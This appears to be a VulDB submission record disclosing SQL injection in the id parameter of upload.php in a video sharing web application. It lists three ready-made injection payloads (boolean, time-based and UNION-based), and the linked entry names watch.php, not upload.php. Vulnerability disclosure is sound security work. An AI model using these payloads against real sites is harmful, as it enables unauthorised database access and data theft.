| Title | SQL injection vulnerability exists in Video Sharing Website |
|---|
| Description | SQL injection vulnerability exists in id parameter of upload.php file of Video Sharing Website
Important user data or system data may be leaked and system security may be compromised
The environment is secure and the information can be used by malicious users.
Payload:
description=555&id=-1' AND 6272=(SELECT (CASE WHEN (6272=6272) THEN 6272 ELSE (SELECT 5051 UNION SELECT 1735) END))-- -&img=&title=555&vid=
or
description=555&id=-1' AND (SELECT 2944 FROM (SELECT(SLEEP(5)))uAsY) AND 'KkdQ'='KkdQ&img=&title=555&vid=
or
description=555&id=-1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b787071,0x686a696f7244735446516f67695962684569544943716462697051646671796f704e594e57544a43,0x7176706b71),NULL,NULL,NULL,NULL,NULL-- -&img=&title=555&vid= |
|---|
| Source | ⚠️ https://github.com/E1CHO/cve_hub/blob/main/Video%20Sharing%20Website/Video%20Sharing%20Website%20vuln%201.pdf |
|---|
| User | SSL_Seven_Security Lab_WangZhiQiang_ZhangYing (UID 41874) |
|---|
| Submission | 04/14/2023 06:08 (3 years ago) |
|---|
| Moderation | 04/14/2023 08:21 (2 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 225915 [Campcodes Video Sharing Website 1.0 watch.php code sql injection] |
|---|
| Points | 20 |
|---|